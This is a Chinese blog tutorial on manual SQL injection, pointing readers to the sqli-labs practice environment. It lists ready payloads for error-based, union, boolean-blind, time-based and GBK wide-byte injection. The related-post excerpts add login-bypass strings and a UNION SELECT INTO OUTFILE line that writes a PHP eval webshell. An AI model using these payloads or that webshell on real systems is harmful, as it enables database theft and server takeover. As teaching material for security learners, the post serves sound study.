SQL注入(手工注入)

最新推荐文章于 2025-11-18 11:42:41 发布
原创 最新推荐文章于 2025-11-18 11:42:41 发布 · 2.2k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了SQL注入的基本概念,包括可能出现的位置、主要分类及其利用方法。详细解析了报错注入、联合查询、布尔盲注等技术手段,并提供了具体的示例代码。

一.sql注入出现在哪里

与数据库交互的地方,有参数传递,get,post,http头,cookie。

二.注入分类

在数据库中 information_schema保存所有数据库中所有的库名,这样我们找库名找表名找字段可以用 information_schema.tables; information_schema.columns来找出我们想要的数据。
1、报错注入的用法
首先我们要注入符号(脑洞大开)去让它进行报错(例如我在参数后面的值加一个单引号)。
(1)floor
?参数=1 '+and (select 1 from(select count(*),concat((selectversion()),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
(2)ExtractValue(有长度限制,最长32位)
?参数=1 ' +and extractvalue(1,concat(0x7e,(select group_concat(version())),0x7e))--+
(3)UpdateXml(有长度限制,最长32位)
?参数=1 '+and Updatexml(1,concat(0x7e,(select group_concat(version())),0x7e),1)--+
(4)NAME_CONST(适用于低版本) 不常用
2、联合查询
1)首先看看有没有回显,用order by来看;用法:?参数=1 order by 数字;例如有5列,
?参数=1 order by 5 返回的是一个正确的界面。
(2)下面就用联合查询看看显示位在哪里(这里参数后面的值放入一个假值)
?参数=1 and 0(假值)union select 1,2,3,4,5 --+(后面的注释掉)
(3)例如显示位在第三位,就在你能看到的第三位进行注入
?参数=1 and 0 union select 1,2,version(),4,5 --+
3、布尔盲注
通过网页仅仅返回True(页面)和False(页面).可以通过构造逻辑判断正误。
eg1:查看当前版本第一个字符是不是5,用返回信息真假判断。
?参数=1'select mid(version(),1,1)=5 --+
eg2:返回正常,没有返回404(报错)页面,证明库的长度为8字节
?参数=1' and length(database())=8--+
4、时间沉睡注入
使用条件语句来判断我们的操作是否正确。使用if或if()函数来判断,sleep()函数,BENCHMARK()函数(不建议使用)。 用ASCII() =>字符转换为ascii码,substr()=> 字符串截取函数。 用二分法获取
eg:类似于布尔盲注,当网页刷新时间为5秒证明是正确的。
?id=2" and if(ascii(substr(database(),1,1))>114,1,sleep(5)) --+
5、宽字节注入
原理:myqsl在使用GBK编码的时候,会认为两个字符为一个汉字。这里我们可以用url编码和16进制来解决。构造方法 (1)使用%df用来把\过滤掉 (2)将\'中的\过滤掉 %**%5c%5c%27
eg:此网站过滤了单引号(')反斜杠(\)
?参数=-1%df%27union select 1,database(),3--+ 

练习sql注入可以通过sqli-labs来练习
SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入手工测试思路
yswy_的博客
11-23 1683
手工测试的时候核心就是判断我们插入的特殊语句是否被执行了,例如插入单引号、if、延时语句等等不同的字符来观察页面回显。下面主要介绍一下我个人的手工挖掘测试思路
sql手工注入
橙子的博客
01-02 862
原理 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 重点部份手工注入网站: 1:开发一个注入网页漏洞。(产生机理…,如何去挖掘一个网站注入漏洞) A:创建数据库的后台(加入数据) mysql> create database infor...
SQL手工注入测试,零基础入门到精通,收藏这篇就够了
最新发布
Javachichi的博客
11-18 300
login.htmllogin.asp参数: http://192.168.10.1/login.asp?原SQL语句:SELECT * FROM data Where uname=‘test’1.构造能执行的SQL语句相当于执行SQL语句为SELECT * FROM data Where uname=‘test’ and 1=1 and ‘a’=‘a’如果执行成功,1=1就是我们可能执行的SQL语句2.猜表名将1=1替换 (select count(*) from data)>0。
sql的手动注入
m0_62691847的博客
03-28 433
union select table_name,1 from information_schema.tables where table_schema=’库名’##获取users表中user_id,user,password,分为2列显示。#如何获取多个字段?#结果:直到不报语法错误,就确认了结果是几个字段。#解决user和password拼接在一起的问题。·获取数据库下所有的表。:获取user表中所有的用户名和密码。·获取表中所有的数据。(dvwa.users是表名)(dvwa.users是表名)
SQL手工注入
weixin_45441727的博客
03-15 276
启动burpsuite监听网页 在监听到的页面右键点击Send to Repeater 然后跳转到Repeater 在输入框输入【 ‘ 】 测试是否存在注入点 对username,password进行一个个试。如果存在会返回界面会不一样。 当我们找到注入点 可以进行字符串猜解长度 ‘order by 4# 报错 ‘order by 3#页面正常 有3个字段 ‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/
手动Sql注入
cai_jshsghjs的博客
03-08 2702
id=-1’ union select 1,2,database() --+)​ concat_ws(1,2,3):将参数2和参数3 使用参数1连接起来 参数1:‘-’ 参数2:执行查询语句 参数3:floor(rand(0)*2)闭合单引号, 使用‘ 号时,发现报错,当使用id=1’ or '时正确, id=1’ and (select database()=‘users’) or。使用括号绕过空格,select(user())from dual where(1=1)and(2=2)
SQL 手工注入
热门推荐
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
漏洞原理SQL注入 手工注入漏洞-优快云博客.pdf
02-24
SQL注入是一种常见的网络攻击技术,其原理是通过将恶意的SQL语句注入到Web表单的输入或通过页面请求的查询字符串中,以此来修改后台数据库的命令。攻击者利用这些注入点,能够操纵数据库,获取未授权的数据访问或对...
精选资源
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)SQL手工注入漏洞测试(...手工注入漏洞测试(Db2数据库)SQL注入漏洞测试(参数加密)SQL手工注入漏洞测试(MySQL数据库)SQL注入漏洞测试(delete注入)SQL过滤字符后...
手工注入教程手工SQL注入教程
04-03
手工注入教程手工SQL注入教程,网上下载的,和大家分享一下,很简单的一个内容,算作很入门级的
SQL注入手工检测sql注入检测
10-22
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可能尝试向应用发送带有恶意SQL指令的请求。为了识别系统中是否存在此类漏洞,手工检测方法是其中一种有效手段。该资源将详细讲解如何通过手动检查来发现潜在的安全...
sql注入手工注入语句
01-15
### 构建SQL注入语句 对于手工构造SQL注入语句,考虑一个登录验证场景下的SQL查询语句: ```sql SELECT * FROM users WHERE username='input_username' AND password='input_password'; ``` 如果`input_username`和`input_password`来自用户的输入而未经适当处理,则可以利用此漏洞。例如,用户提交如下数据作为用户名: ```plaintext admin' -- ``` 这里的两个连字符(`--`)标志着SQL注释的开始[^1]。 因此原始查询变为: ```sql SELECT * FROM users WHERE username='admin' -- ' AND password='any_input'; ``` 由于双连字符后面的内容被视为注释,所以实际上只执行了前面的部分,这意味着无论提供的密码是什么,只要用户名设置为上述模式,就可能绕过身份验证逻辑成功登录。 另一个例子涉及从URL参数获取ID的情况,像这样: ```plaintext http://example.com/article.php?id=5 ``` 对应的SQL可能是: ```sql SELECT title, content FROM articles WHERE id = $_GET['id']; ``` 假设攻击者修改URL为: ```plaintext http://example.com/article.php?id=5 OR 1=1 ``` 那么完整的SQL会变成: ```sql SELECT title, content FROM articles WHERE id = 5 OR 1=1; ``` 因为`OR 1=1`总是成立,这将返回表中所有的记录而不是仅仅指定编号的文章条目。 为了进一步探索数据库结构,还可以尝试联合查询(UNION SELECT),这是一种更为复杂的技巧,允许攻击者附加额外的选择子句来检索其他表格的信息。例如: ```sql ... UNION SELECT column_name(s) FROM another_table ... ``` 需要注意的是,成功的SQL注入不仅依赖于找到合适的入口点,还需要理解目标系统的内部工作原理以及所使用的具体RDBMS特性[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值